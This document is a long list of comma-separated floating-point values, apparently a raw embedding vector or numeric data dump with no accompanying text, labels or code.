0.007143635302782059, 0.00966667477041483, -0.028335673734545708, -0.01188366487622261, 0.011092416010797024, 0.006303866393864155, 0.002722717821598053, 0.024409286677837372, 0.037382785230875015, 0.006486749276518822, -0.0010403805645182729, 0.013219830580055714, 0.01445149164646864, -0.010540034621953964, -0.028425248339772224, -0.008024459704756737, 0.01241365261375904, 0.033889345824718475, 0.02688753791153431, -0.011383536271750927, 0.01906462386250496, -0.04236914590001106, 0.012279289774596691, 0.011361141689121723, -0.025036314502358437, 0.016317645087838173, 0.019960377365350723, 0.0068711768835783005, 0.010510176420211792, -0.020378395915031433, 0.026185864582657814, 0.033590760082006454, -0.03774108737707138, -0.01526513509452343, 0.024364499375224113, -0.005736555438488722, 0.03741264343261719, -0.032754722982645035, -0.0030101053416728973, -0.020632192492485046, -0.01471275370568037, -0.019303491339087486, 0.01857195794582367, 0.00905457604676485, 0.032754722982645035, 0.006516607943922281, 0.02339409850537777, 0.007640032097697258, -0.032784584909677505, -0.04616117104887962, 0.0014042804250493646, 0.029306072741746902, -0.03872641548514366, 0.011891129426658154, 0.011928452178835869, -0.014026009477674961, 0.005284946411848068, 0.010525105521082878, -0.011316354386508465, -0.02551404945552349, -0.011726908385753632, 0.0336504764854908, 0.013063074089586735, -0.019602075219154358, 0.017452266067266464, -0.030082393437623978, 0.003799488302320242, 0.014100654982030392, 0.02632022835314274, 0.04487725719809532, -0.017422407865524292, 0.004777352791279554, -0.003429990028962493, -0.00243906257674098, 0.0056731062941253185, 0.010166803374886513, 0.0025622285902500153, -0.003485974622890353, 0.0349343903362751, -0.021662307903170586, -0.01616835407912731, -0.017288045957684517, -0.017601558938622475, 0.00642703240737319, -0.04207056388258934, -0.02449886128306389, -0.02543940395116806, 0.029261285439133644, -0.005512617062777281, 0.016422150656580925, 0.016526654362678528, 0.004030891228467226, 0.03908471763134003, 0.007457149215042591, 0.016646089032292366, -0.012197178788483143, -0.05034135282039642, -0.006318795494735241, 0.01310039684176445, -0.007065256591886282, -0.02221469022333622, 0.04634032025933266, 0.031799253076314926, 0.03956245258450508, 0.004855731036514044, 0.031799253076314926, -0.0011588812340050936, 0.02300594002008438, -0.01704917848110199, -0.023662826046347618, 0.01724325679242611, -0.014406704343855381, -0.026529237627983093, 0.018960118293762207, -0.04613131284713745, -0.01948264241218567, -0.04230942949652672, 0.0020191778894513845, -0.02691739611327648, 0.00709138298407197, -0.0003321753174532205, 0.013331799767911434, 0.011226778849959373, -0.018975047394633293, -0.02726076915860176, -0.012995892204344273, 0.03899514302611351, 0.010674397461116314, 0.03902500122785568, -0.020109668374061584, 0.01121931429952383, 0.02502138540148735, -0.014526138082146645, 0.005576066207140684, -0.0033460131380707026, -0.012630126439034939, 0.041712261736392975, -0.0024726532865315676, 0.01586976833641529, 0.014302199706435204, 0.028679044917225838, 0.0020602333825081587, -0.018049435690045357, -0.006587521638721228, 0.027006972581148148, -0.02866411581635475, 0.0060948571190238, -0.00022102255024947226, 0.031082650646567345, -0.014742611907422543, 0.017138753086328506, -0.004945306573063135, -0.001141152810305357, 0.0026816625613719225, -0.022722283378243446, -0.0015190489357337356, 0.002651803893968463, -0.015160630457103252, -0.0005206568166613579, -0.023379169404506683, -0.016690876334905624, 0.04777352884411812, 0.0017233926337212324, 0.015280064195394516, 0.018766038119792938, 0.016347503289580345, -0.010360883548855782, -0.010666932910680771, -0.012361399829387665, 0.004758691415190697, 0.022498345002532005, -0.043951645493507385, -0.038636840879917145, 0.03141109272837639, 0.019811084493994713, 0.017362691462039948, -0.01163733284920454, -0.018437596037983894, -0.015287528745830059, -0.025319969281554222, -0.013749818317592144, -0.00989061314612627, -0.018198728561401367, 0.008920213207602501, -0.03323246166110039, -0.01071172021329403, 0.01940799504518509, -0.009502452798187733, -0.04001032933592796, 0.016870027408003807, 0.007733339909464121, 0.024050984531641006, -0.020363466814160347, -0.00833797361701727, -0.002657402539625764, 0.016944672912359238, -0.0032862962689250708, 0.0304854828864336, 0.009950329549610615, 0.0022991010919213295, 0.007546724285930395, 0.004273491445928812, -0.010786366648972034, -0.019497571513056755, 0.014727682806551456, 0.006042604800313711, -0.02243862859904766, -0.021886248141527176, 0.010763972997665405, 0.025767846032977104, -0.00046980413026176393, -0.0005085268057882786, 0.0198260135948658, 0.018960118293762207, 0.020796414464712143, 0.08396197110414505, 0.006486749276518822, 0.032485999166965485, -0.0029802469071000814, -0.004516091197729111, 0.03505382686853409, -0.04344405233860016, 0.011368606239557266, 0.01660129986703396, -0.03983118012547493, 0.002713387133553624, 0.014720218256115913, -0.0011084951693192124, 0.026603883132338524, 0.009509917348623276, 0.004911715630441904, -0.003525163745507598, 0.003797622164711356, -0.04180183634161949, 0.02339409850537777, 0.005311072804033756, -0.034456655383110046, -0.020482899621129036, 0.03830839693546295, 0.03239642456173897, 0.021318936720490456, -0.030560128390789032, -0.0009703997639007866, 0.01378714106976986, 0.00033287511905655265, 0.005508884787559509, 0.00880824401974678, -0.013055609539151192, 0.01002497598528862, 0.0129660340026021, 0.022274406626820564, 0.017989719286561012, 0.038368113338947296, -0.03968188539147377, -0.03406849503517151, 0.0032844298984855413, 0.011405929923057556, 0.04009990394115448, 0.00012398256512824446, 0.014436562545597553, 0.0435037687420845, 0.016347503289580345, 0.016616230830550194, -0.013092932291328907, -0.03251585736870766, -0.030425764620304108, -0.023035798221826553, 0.0009022851590998471, -0.01212999690324068, -0.030022675171494484, -0.024095773696899414, 0.004075678996741772, 0.015138236805796623, 0.0006876775296404958, -0.01579512283205986, -0.010771437548100948, -0.02073669619858265, -0.0070615243166685104, -0.006124715320765972, 0.00540064787492156, 0.004236168228089809, -0.02209525555372238, 0.012271825224161148, 0.00642703240737319, -0.009203868918120861, 0.02935086004436016, 0.01758662983775139, 0.00010887839016504586, 0.003760299179702997, -0.018975047394633293, -0.013175043277442455, -0.020900918170809746, -0.028828337788581848, 0.015780193731188774, -0.004273491445928812, -0.02851482480764389, 0.012951104901731014, 0.015220346860587597, -0.03744250163435936, 0.04389192909002304, -0.0018400272820144892, -0.03344146907329559, -0.013167578727006912, -0.023856904357671738, 0.007009271997958422, 0.00412793131545186, -0.0051505835726857185, 0.02258792147040367, 0.01985587179660797, -0.0028365531470626593, -0.003409462282434106, 0.026902467012405396, -0.005908241495490074, -0.020751625299453735, 0.0011943381978198886, -0.03711405768990517, 0.00026056167553178966, -0.012212107889354229, -0.010644539259374142, 0.004448909778147936, 0.008688810281455517, 0.01766127534210682, 0.015660759061574936, -0.031022934243083, -0.026335157454013824, -0.0002845884009730071, -0.01268237829208374, 0.020512757822871208, -0.00576268183067441, 0.008405154570937157, -0.02479744702577591, 0.012286754325032234, 0.01171197835355997, -0.01127903163433075, -0.006091124843806028, 0.03302345052361488, 0.02308058552443981, -0.003989836201071739, 0.00021519081201404333, 0.007472078315913677, -0.00307542085647583, 0.014667965471744537, 0.0015731672756373882, 0.010226520709693432, 0.0064643556252121925, -0.0034430529922246933, -0.029335930943489075, 0.00606499845162034, 0.0036651252303272486, 0.0042772237211465836, 0.009271049872040749, -0.007277998141944408, 0.010107086971402168, 0.005758949555456638, 0.026454590260982513, 0.009397948160767555, -0.022453557699918747, -0.028305815532803535, -0.008912748657166958, 0.026529237627983093, -0.021244291216135025, 0.0019613271579146385, -0.0011971374042332172, -0.025110960006713867, -0.0019128072308376431, -0.00827825628221035, 0.03156038746237755, 0.041562967002391815, 0.01389911025762558, 0.007710945792496204, -0.03173953667283058, 0.0026107486337423325, 0.015526396222412586, 0.02885819599032402, -0.007696016691625118, -0.0023214947432279587, 0.009987653233110905, 0.03233670815825462, -0.011868735775351524, 0.0057738786563277245, -0.01520541775971651, 0.020706837996840477, 0.021020352840423584, -0.01769113354384899, -0.011876200325787067, -0.0032956269569694996, 0.003415060695260763, 0.02346874587237835, -0.006173235364258289, 0.01857195794582367, -0.008352902717888355, 0.007166028954088688, -0.013316870667040348, -0.010875942185521126, -0.016317645087838173, 0.03353104367852211, -0.010696791112422943, -0.00622921995818615, -0.034874673932790756, 0.018840685486793518, 0.03896528482437134, -0.02157273329794407, 0.0038368115201592445, 0.041443534195423126, -0.008897819556295872, -0.028275957331061363, -0.03284430131316185, -0.012809276580810547, -0.008658952079713345, -0.02482730522751808, 0.0181091520935297, -0.020408254116773605, 0.012249430641531944, 0.005635783076286316, 0.011532828211784363, 0.01124170795083046, 0.0192885622382164, -0.011137203313410282, 0.008442478254437447, 0.009636816568672657, -0.022319193929433823, 0.004986362066119909, 0.0343969389796257, -0.043384335935115814, -0.007632567547261715, 0.0026163470465689898, -0.055387433618307114, -0.002146076411008835, -0.03944301977753639, 0.0038815990556031466, -0.013578131794929504, 0.017676204442977905, 0.012839135713875294, -0.009995117783546448, 0.008293185383081436, -0.012115067802369595, -0.024200277402997017, 0.022677496075630188, 0.013085467740893364, -0.0006652837037108839, 0.009569634683430195, 0.0013604258419945836, 0.03538226708769798, -0.03580028563737869, -0.015615971758961678, 0.005299875512719154, -0.01670580543577671, -0.0276489295065403, -0.00703539839014411, -0.00361287291161716, 0.009487523697316647, 0.0008099105907604098, 0.014765005558729172, 0.047982536256313324, 0.003536360803991556, 0.0076362998224794865, 0.014496279880404472, -0.009383019059896469, -0.0016618096269667149, 0.0034766437020152807, 0.013996150344610214, 0.012645055539906025, -0.001054376713000238, 0.03281444311141968, -0.009099364280700684, 0.006225487682968378, -0.01380207110196352, -0.004572075791656971, 0.01074904389679432, -0.01940799504518509, -0.01921391487121582, 0.004769888240844011, -0.02342395670711994, -0.010980446822941303, 0.00009832295472733676, 0.027051759883761406, -0.006553930696099997, -0.004781085066497326, -0.024050984531641006, -0.010390741750597954, -0.0011523497523739934, 0.04735551029443741, 0.01074904389679432, -0.011853806674480438, -0.006277740001678467, -0.024274922907352448, 0.012592803686857224, 0.007068989332765341, -0.07506415247917175, 0.009741321206092834, -0.011211849749088287, -0.014720218256115913, 0.0030511608347296715, 0.018213657662272453, 0.02969423308968544, -0.05213286355137825, -0.027096547186374664, 0.028693974018096924, 0.03269500657916069, 0.02430478297173977, -0.03971174359321594, -0.01340644620358944, -0.019154198467731476, -0.011159596964716911, -0.015959344804286957, 0.0057813432067632675, -0.007822914980351925, 0.005766414105892181, 0.0011290227994322777, 0.02605150081217289, 0.012577873654663563, 0.013906574808061123, 0.027813149616122246, 0.01636243239045143, -0.0018250980647280812, 0.019527429714798927, -0.04245872423052788, -0.012973498553037643, -0.0009092832333408296, -0.026379944756627083, -0.004001033026725054, 0.026111219078302383, 0.031022934243083, -0.014055867679417133, -0.005240158643573523, -0.023662826046347618, -0.015705546364188194, 0.007042862940579653, -0.018318161368370056, -0.03627802059054375, 0.015056125819683075, 0.0008047786541283131, 0.01795986108481884, -0.003306823782622814, -0.012928711250424385, 0.014093190431594849, 0.007468346040695906, 0.022677496075630188, 0.012809276580810547, 0.0262007936835289, -0.00775573356077075, -0.02130400761961937, -0.0336504764854908, -0.0047997464425861835, 0.01948264241218567, 0.008599234744906425, 0.00017215264961123466, -0.007673623040318489, 0.0021124857012182474, -0.0031649961601942778, -0.0035998099483549595, -0.0027395132929086685, -0.03577042743563652, 0.0027768362779170275, -0.013137719593942165, -0.02122936211526394, -0.00789756141602993, -0.017646346241235733, 0.011973240412771702, -0.004613131284713745, 0.01321236602962017, -0.017720993608236313, 0.021960893645882607, -0.0030157039873301983, 0.03072435036301613, -0.018437596037983894, -0.0106893265619874, -0.001978122629225254, 0.016661018133163452, -0.042010847479104996, -0.014727682806551456, -0.02415549010038376, -0.005934367887675762, -0.02103528194129467, 0.031231943517923355, 0.047713808715343475, 0.028007229790091515, -0.03594958037137985, 0.01891533099114895, -0.0304854828864336, -0.011174526996910572, 0.0026760639157146215, 0.032187413424253464, -0.0040458207949995995, 0.021617520600557327, -0.0016272857319563627, -0.006998075172305107, -0.026290370151400566, -0.02373747155070305, 0.013996150344610214, 0.017004389315843582, 0.012264360673725605, -0.014817258343100548, -0.03006746433675289, 0.011831413023173809, 0.012533086352050304, -0.02666359953582287, 0.026021642610430717, -0.0004884656518697739, 0.008226004429161549, -0.0011644797632470727, -0.01086101308465004, 0.006203094031661749, -0.013436304405331612, 0.002713387133553624, 0.027051759883761406, -0.018557028844952583, -0.025125889107584953, 0.006277740001678467, 0.01298842765390873, 0.02551404945552349, -0.00012293286272324622, -0.006270275451242924, -0.02479744702577591, 0.00468031270429492, 0.03394906222820282, -0.034874673932790756, 0.010450459085404873, -0.007830379530787468, -0.03747235983610153, 0.011764231137931347, 0.024394357576966286, 0.05374521762132645, -0.033590760082006454, 0.012473369017243385, 0.00615084171295166, 0.019273633137345314, 0.006244149524718523, 0.010092157870531082, 0.003263902384787798, -0.013361657969653606, 0.01758662983775139, 0.005075937137007713, -0.0026816625613719225, -0.01431712880730629, 0.017511984333395958, 0.009442736394703388, -0.013563202694058418, -0.02767878770828247, 0.015347246080636978, -0.03759179264307022, -0.012152391485869884, 0.005467829294502735, 0.05523814260959625, 0.005893312394618988, -0.014996408484876156, 0.004482500720769167, -0.0011971374042332172, 0.015071054920554161, 0.014899368397891521, -0.0025118424091488123, -0.011398465372622013, -0.012406188063323498, 0.026872608810663223, -0.0031295393127948046, 0.03508368507027626, -0.018855614587664604, 0.004635524936020374, -0.004646722227334976, 0.004590737167745829, -0.027932584285736084, 0.008420084603130817, -0.015660759061574936, -0.018213657662272453, -0.029186639934778214, 0.01515316590666771, -0.015466679818928242, -0.03215755522251129, -0.0031444684136658907, -0.013421375304460526, 0.004810943268239498, -0.011853806674480438, -0.009300909005105495, 0.027126405388116837, 0.04637017846107483, -0.014936692081391811, 0.008218539878726006, 0.03845768794417381, -0.009323302656412125, 0.019661791622638702, 0.01038327720016241, -0.04174211993813515, -0.018780967220664024, 0.004949038848280907, -0.003006373066455126, -0.01776578091084957, 0.015026267617940903, -0.04666876420378685, 0.005904509220272303, 0.00922626256942749, -0.01204042136669159, 0.001493855845183134, -0.007330250460654497, -0.03038097731769085, -0.018362948670983315, 0.005829863250255585, -0.0023457547649741173, -0.01795986108481884, -0.026484448462724686, 0.021811600774526596, 0.07494471967220306, -0.009614421986043453, 0.002461456460878253, -0.023035798221826553, 0.004613131284713745, 0.004266026895493269, 0.00600901385769248, -0.005613389424979687, -0.016183283179998398, -0.0256633423268795, 0.0064307646825909615, -0.015100913122296333, -0.011286496184766293, 0.005598460324108601, 0.012316612526774406, -0.007733339909464121, 0.001235393574461341, -0.027708645910024643, 0.04120466858148575, -0.0010646404698491096, 0.013660242781043053, -0.009159080684185028, 0.007378770504146814, -0.021736955270171165, 0.02308058552443981, -0.0007431955891661346, -0.006520340219140053, -0.02076655440032482, -0.007483275141566992, -0.016183283179998398, 0.007490739692002535, 0.007382502779364586, 0.0020900918170809746, -0.008666416630148888, 0.006583789363503456, -0.005411844700574875, 0.005549940280616283, -0.007696016691625118, -0.016870027408003807, -0.015003873035311699, -0.0015918288845568895, -0.004105537664145231, -0.00121953128837049, -0.03451637178659439, 0.00014719285536557436, 0.0007501936634071171, 0.036964766681194305, -0.004963967949151993, -0.034844815731048584, -0.011562686413526535, -0.014817258343100548, -0.031530529260635376, 0.020363466814160347, 0.016452008858323097, 0.00883063767105341, 0.018900401890277863, 0.02423013560473919, -0.010122016072273254, -0.022304264828562737, -0.001532111898995936, -0.027977371588349342, 0.008240933530032635, -0.028111735358834267, -0.010659468360245228, 0.017511984333395958, -0.01719846948981285, -0.026215722784399986, -0.006180699914693832, -0.019273633137345314, 0.044220373034477234, -0.000018078360881190747, 0.02817145176231861, 0.007733339909464121, -0.007333982735872269, 0.019154198467731476, 0.007076453883200884, 0.024931808933615685, 0.053894512355327606, -0.0014182765735313296, -0.018780967220664024, 0.0211099274456501, 0.0104206008836627, -0.010122016072273254, 0.04428008943796158, -0.004949038848280907, 0.03436708077788353, -0.023946480825543404, -0.016616230830550194, -0.028201309964060783, -0.008352902717888355, -0.0025752917863428593, 0.02039332501590252, 0.024095773696899414, 0.007770662661641836, -0.004990094341337681, 0.00844994280487299, 0.029873384162783623, -0.0028496163431555033, -0.013227295130491257, -0.01365277823060751, -0.0006816125242039561, -0.010756508447229862, 0.018840685486793518, -0.021766813471913338, 0.002425999380648136, -0.006613647565245628, -0.0022337855771183968, 0.006908500101417303, 0.013279547914862633, -0.01731790415942669, -0.020512757822871208, -0.01104762777686119, 0.019587146118283272, -0.007255604490637779, -0.006527804769575596, 0.02300594002008438, 0.008785850368440151, 0.0013025751104578376, 0.0010581089882180095, -0.032605431973934174, -0.02187131717801094, -0.04908730089664459, 0.022080326452851295, -0.014145443215966225, -0.01663115993142128, 0.004239900503307581, 0.010144409723579884, -0.0028925377409905195, 0.013831929303705692, 0.018288303166627884, 0.019422924146056175, 0.01754184253513813, 0.00036063414881937206, 0.0006802129209972918, 0.007031666114926338, -0.02494673803448677, 0.016347503289580345, -0.0005869052256457508, -0.012421117164194584, -0.0003228445420973003, -0.025618553161621094, 0.02361803688108921, 0.025887280702590942, 0.01033102534711361, -0.0028552147559821606, 0.0076101734302937984, 0.012958569452166557, -0.013182507827877998, 0.008554447442293167, 0.04583272710442543, -0.004863195586949587, -0.028693974018096924, 0.0012671181466430426, 0.012107603251934052, -0.01349602174013853, 0.021557804197072983, 0.025409545749425888, 0.008479801006615162, 0.014152907766401768, 0.0013063073856756091, 0.0014210757799446583, 0.006244149524718523, 0.0009008855558931828, -0.021318936720490456, -0.012234501540660858, 0.03341161087155342, 0.0043854606337845325, -0.04299617558717728, -0.020632192492485046, -0.020676979795098305, 0.0016300850547850132, 0.004004765301942825, -0.00681519228965044, 0.014623178169131279, 0.03693490847945213, -0.002547299489378929, -0.006826389115303755, 0.03508368507027626, 0.023722542449831963, -0.038218822330236435, -0.001776578021235764, 0.026783034205436707, 0.00924865622073412, 0.0055835312232375145, -0.016048919409513474, -0.013884181156754494, -0.0010515773901715875, 0.009681603871285915, -0.0071958876214921474, 0.016571441665291786, 0.019079552963376045, 0.022528203204274178, -0.009509917348623276, -0.01970658078789711, 0.0026032840833067894, -0.011443252675235271, -0.018661534413695335, -0.013488557189702988, -0.0009881282458081841, 0.009457665495574474, -0.0026014179456979036, 0.009188939817249775, 0.004183915909379721, 0.016093706712126732, -0.004083143547177315, -0.044907115399837494, -0.015041196718811989, -0.010219056159257889, 0.01061468105763197, -0.008136428892612457, -0.0002768905251286924, 0.022274406626820564, 0.014862045645713806, -0.018631676211953163, -0.004195112735033035, 0.0023793457075953484, 0.0013977489434182644, -0.021856388077139854, 0.013137719593942165, 0.016690876334905624, 0.009898077696561813, 0.023483674973249435, 0.005437971092760563, 0.01731790415942669, 0.0038592051714658737, 0.020229103043675423, 0.03287415951490402, -0.03995061293244362, -0.004228703677654266, -0.003806952852755785, -0.025946997106075287, -0.008614163845777512, -0.012032956816256046, 0.010696791112422943, -0.0075019365176558495, 0.0014975881204009056, 0.006400906015187502, -0.008860496804118156, -0.0033758715726435184, -0.01389911025762558, 0.02502138540148735, -0.0003307756851427257, -0.015854839235544205, 0.018422666937112808, -0.014309664256870747, -0.00030371645698323846, -0.016452008858323097, -0.000920480175409466, -0.022916363552212715, 0.014055867679417133, -0.005214032717049122, -0.008965001441538334, -0.00722574582323432, 0.01967672072350979, -0.013063074089586735, 0.03645717352628708, 0.01393643394112587, -0.010472852736711502, 0.02814159356057644, -0.00576268183067441, 0.008800779469311237, -0.037800803780555725, -0.010465388186275959, -0.008763456717133522, -0.021244291216135025, 0.042010847479104996, 0.0058074695989489555, 0.006124715320765972, 0.004590737167745829, -0.005512617062777281, 0.02184145897626877, 0.010211591608822346, 0.014055867679417133, 0.017497055232524872, -0.004411586560308933, -0.0030996808782219887, 0.02066205069422722, -0.028261026367545128, -0.011577615514397621, 0.005396915599703789, -0.03642731532454491, 0.04108523204922676, -0.02624558098614216, -0.004781085066497326, -0.00371177913621068, -0.04544456675648689, -0.027201052755117416, 0.0068786414340138435, -0.003372139297425747, -0.020647121593356133, -0.008651487529277802, 0.009853290393948555, 0.002496913308277726, 0.0009741320973262191, 0.028962701559066772, 0.0026816625613719225, 0.003437454579398036, 0.00035293627297505736, -0.0007623236742801964, 0.01019666250795126, -0.0009316771174781024, 0.03762165457010269, 0.031381234526634216, 0.004060749895870686, -0.03884584829211235, 0.040577638894319534, -0.001689801923930645, -0.01936320774257183, 0.013451233506202698, -0.02654416672885418, 0.02582756243646145, 0.007625102996826172, 0.0023084317799657583, -0.010875942185521126, -0.025081101804971695, -0.01818379946053028, -0.013757282868027687, 0.012973498553037643, -0.0019165395060554147, 0.002592087024822831, 0.0009685336262919009, -0.010853548534214497, -0.01857195794582367, -0.02312537282705307, -0.00924865622073412, 0.011592544615268707, 0.010457923635840416, -0.005206568166613579, -0.0034038638696074486, -0.018930260092020035, 0.003485974622890353, 0.023931551724672318, 0.03287415951490402, 0.014503744430840015, 0.004777352791279554, -0.009898077696561813, 0.019691651687026024, -0.0003625002864282578, -0.01190605852752924, -0.01190605852752924, -0.019945448264479637, 0.03902500122785568, 0.008860496804118156, 0.013115325942635536, 0.022005680948495865, 0.0020900918170809746, -0.00844994280487299, 0.005441703367978334, 0.0037808269262313843, -0.01724325679242611, -0.009942864999175072, 0.003344147000461817, 0.008763456717133522, 0.03866669908165932, 0.0054827588610351086, 0.02179667167365551, -0.0008836236665956676, 0.020497828722000122, 0.030022675171494484, -0.005919438786804676, -0.0067704045213758945, 0.0070876507088541985, -0.02381211705505848, 0.00015803986752871424, 0.02654416672885418, 0.009278514422476292, 0.009435271844267845, 0.028007229790091515, 0.008591770194470882, -0.016646089032292366, -0.008248398080468178, 0.025872351601719856, 0.014511208981275558, 0.000310714531224221, -0.00537452194839716, -0.007080186158418655, 0.017974790185689926, -0.0012437911937013268, -0.009995117783546448, 0.032784584909677505, 0.005553672555834055, -0.004068214446306229, -0.0006741479155607522, 0.004094340372830629, -0.02984352596104145, 0.013757282868027687, -0.009196404367685318, 0.006744278594851494, -0.008912748657166958, -0.017258185893297195, 0.017093965783715248, 0.011293960735201836, 0.0014677296858280897, 0.038487546145915985, -0.0024801178369671106, 0.006456890609115362, -0.008546982891857624, -0.007703481242060661, -0.03239642456173897, 0.013637849129736423, 0.009547241032123566, -0.013719960115849972, 0.01818379946053028, 0.006837585940957069, 0.04027905687689781, 0.019393065944314003, 0.0008472336339764297, -0.010547499172389507, 0.04299617558717728, -0.013242224231362343, 0.02248341590166092, -0.007151099853217602, -0.00971892662346363, -0.02472279965877533, -0.021408511325716972, 0.00700553972274065, 0.012839135713875294, -0.012159856036305428, 0.0030119717121124268, -0.008397690020501614, -0.015541325323283672, -0.008464871905744076, -0.012958569452166557, -0.006512875203043222, 0.025394614785909653, -0.013070538640022278, 0.014570925384759903, 0.001610490377061069, -0.02457350865006447, -0.01513077225536108, 0.003077286994084716, 0.015929484739899635, 0.022334124892950058, -0.00019804552721325308, -0.009300909005105495, -0.004501162096858025, -0.014137978665530682, 0.016616230830550194, -0.016944672912359238, -0.009547241032123566, 0.02290143445134163, -0.006374780088663101, -0.016466937959194183, 0.00031701280386187136, -0.011271566152572632, -0.017302975058555603, -0.02073669619858265, -0.006072463002055883, -0.026753176003694534, -0.002461456460878253, 0.023140301927924156, 0.020706837996840477, 0.004829605109989643, 0.011756766587495804, 0.0075355274602770805, -0.02149808779358864, 0.006277740001678467, 0.007222013548016548, -0.014697824604809284, 0.005497687961906195, -0.012533086352050304, -0.013473628088831902, 0.02331945300102234, -0.005800004582852125, 0.012540550902485847, 0.014324593357741833, 0.002982113044708967, 0.01418276596814394, 0.005158048123121262, -0.003948780708014965, 0.028574541211128235, -0.00844994280487299, 0.021960893645882607, 0.003172460710629821, -0.0011187589261680841, -0.02551404945552349, -0.01746719516813755, -0.011338748037815094, -0.008636558428406715, -0.02563348412513733, 0.03132151812314987, 0.004336940590292215, -0.01704917848110199, 0.012839135713875294, -0.019542358815670013, 0.009853290393948555, -0.004990094341337681, 0.004336940590292215, 0.013331799767911434, 0.002916797762736678, -0.0049266451969742775, 0.006859980057924986, -0.002528637880459428, -0.007927419617772102, 0.00576268183067441, 0.03687519207596779, 0.008263327181339264, 0.009793573059141636, 0.00755792111158371, -0.012264360673725605, 0.0023289595264941454, -0.01857195794582367, 0.009793573059141636, 0.0038368115201592445, 0.006591253913938999, -0.008226004429161549, -0.019796155393123627, 0.0262007936835289, 0.016914814710617065, -0.023409027606248856, -0.0072033521719276905, -0.018825756385922432, -0.002496913308277726, 0.020975563675165176, 0.00023163629521150142, 0.003596077673137188, -0.010525105521082878, -0.005217764992266893, -0.00548649113625288, -0.0213786531239748, -0.000801512913312763, 0.01704917848110199, -0.000035544391721487045, -0.01404840312898159, 0.0006606183014810085, 0.01616835407912731, 0.013048144988715649, 0.020035022869706154, -0.008778385818004608, -0.007748269010335207, 0.005307340528815985, 0.012630126439034939, -0.003797622164711356, -0.01124170795083046, -0.00830064993351698, 0.011122274212539196, 0.0013268351322039962, -0.0063561187125742435, -0.00020096139633096755, 0.002405471634119749, 0.012824206613004208, -0.02870890498161316, 0.0005449167801998556, 0.007740804459899664, 0.016392292454838753, -0.020721767097711563, -0.010375812649726868, -0.01625792868435383, -0.021886248141527176, -0.006393441464751959, -0.0036669913679361343, 0.006367315538227558, -0.004075678996741772, -0.0280221588909626, -0.013369123451411724, 0.01019666250795126, -0.005445435643196106, -0.004340672865509987, -0.0003072154941037297, 0.011495505459606647, 0.005986620206385851, 0.00041848490945994854, 0.03630788251757622, 0.004945306573063135, 0.005434238817542791, 0.008890355005860329, -0.00045300874626263976, 0.004557146690785885, 0.013279547914862633, -0.02228933572769165, 0.013555738143622875, 0.011532828211784363, 0.0036296683829277754, 0.0014192096423357725, 0.011137203313410282, -0.007595244329422712, 0.003243374638259411, -0.010853548534214497, 0.01015933882445097, 0.020378395915031433, 0.004661651328206062, 0.012234501540660858, -0.018557028844952583, -0.002317762468010187, 0.0039114574901759624, -0.034605950117111206, 0.016078777611255646, -0.013331799767911434, -0.008016995154321194, -0.006169503089040518, 0.01712382398545742, 0.028619328513741493, -0.004411586560308933, -0.006621112115681171, 0.011308889836072922, -0.014384310692548752, -0.006606183014810085, -0.00017005323024932295, -0.011458181776106358, 0.018661534413695335, -0.0069532874040305614, 0.017915071919560432, -0.000043504700443008915, -0.0181091520935297, -0.014339522458612919, -0.003749102121219039, 0.028186380863189697, -0.013003356754779816, -0.016033990308642387, -0.011152132414281368, 0.03538226708769798, -0.0028122931253165007, 0.0032265791669487953, -0.00953231193125248, -0.012533086352050304, -0.01520541775971651, 0.003719243686646223, -0.016586370766162872, -0.009793573059141636, -0.02061726339161396, 0.009763714857399464, 0.019527429714798927, -0.006057533901184797, 0.009808502160012722, -0.0062142908573150635, -0.0013398980954661965, 0.024618295952677727, -0.034187931567430496, 0.03215755522251129, 0.010696791112422943, 0.007748269010335207, -0.002547299489378929, 0.019198985770344734, 0.004945306573063135, -0.0004963967949151993, 0.032575573772192, -0.009375554509460926, -0.03786052018404007, 0.01099537592381239, -0.0030716885812580585, -0.01724325679242611, 0.005083401687443256, -0.012249430641531944, -0.0032825637608766556, -0.0006256279302760959, -0.008576841093599796, 0.04177197813987732, 0.004911715630441904, -0.00820361077785492, 0.0062478817999362946, 0.011025234125554562, 0.009017253294587135, -0.005822398699820042, 0.0015619704499840736, 0.005467829294502735, -0.01781056821346283, 0.010450459085404873, -0.000040734630601946265, -0.004295885097235441, -0.012898852117359638, 0.004893054254353046, 0.01072665024548769, -0.021139785647392273, 0.008703739382326603, 0.005654444918036461, -0.012816742062568665, -0.006624844390898943, 0.018900401890277863, 0.008920213207602501, 0.018960118293762207, -0.007076453883200884, 0.0033329499419778585, -0.026633741334080696, 0.013928969390690327, 0.00031701280386187136, -0.00007552089664386585, 0.0038013544399291277, -0.005661909468472004, -0.0016963334055617452, -0.0066621676087379456, 0.0055835312232375145, 0.010428065434098244, 0.0017943065613508224, -0.013055609539151192, -0.0057738786563277245, -0.02726076915860176, 0.005516349337995052, 0.0013902842765673995, 0.002881340915337205, 0.022767072543501854, 0.01689988560974598, -0.006785333622246981, 0.018930260092020035, 0.019840942695736885, -0.00911429338157177, -0.0414733923971653, -0.019273633137345314, 0.004803478717803955, 0.007068989332765341, -0.003967442084103823, 0.002360684098675847, 0.005031149368733168, 0.022453557699918747, 0.01898997649550438, -0.004549682140350342, 0.0076437643729150295, 0.024200277402997017, 0.003674456151202321, 0.015526396222412586, -0.00869627483189106, 0.023991268128156662, -0.00909189973026514, 0.013854322955012321, -0.005613389424979687, -0.007807985879480839, 0.020064881071448326, -0.0006792798521928489, 0.003777094418182969, 0.025573765859007835, 0.019378136843442917, 0.007322785910218954, 0.00690103555098176, 0.0180046483874321, -0.007793056778609753, -0.004396657459437847, -0.0009778643725439906, -0.009293444454669952, -0.011577615514397621, -0.015056125819683075, 0.0005243890918791294, 0.006303866393864155, 0.0232000183314085, 0.019990235567092896, -0.01316011417657137, -0.000022947855541133322, 0.009278514422476292, -0.0160190612077713, -0.02817145176231861, -0.0007567252032458782, 0.0002766572288237512, 0.012659984640777111, 0.014212624169886112, -0.0011682120384648442, -0.006781601347029209, -0.006091124843806028, -0.0008495663641951978, -0.030993076041340828, 0.021438369527459145, -0.01074904389679432, 0.02263270877301693, -0.025603624060750008, 0.0077184103429317474, -0.0060052815824747086, 0.005553672555834055, 0.011092416010797024, 0.0053446632809937, 0.0017215264961123466, 0.010151874274015427, 0.003926386591047049, -0.019184056669473648, -0.01205535139888525, 0.01177169568836689, 0.02290143445134163, 0.01849731244146824, -0.004497429821640253, 0.011331283487379551, 0.0014472019392997026, -0.005546208005398512, -0.013861787505447865, -0.0034057300072163343, -0.012652520090341568, 0.0005458498490042984, 0.0354718454182148, 0.003062357660382986, 0.014167836867272854, -0.01993051916360855, 0.009174009785056114, -0.02042318321764469, 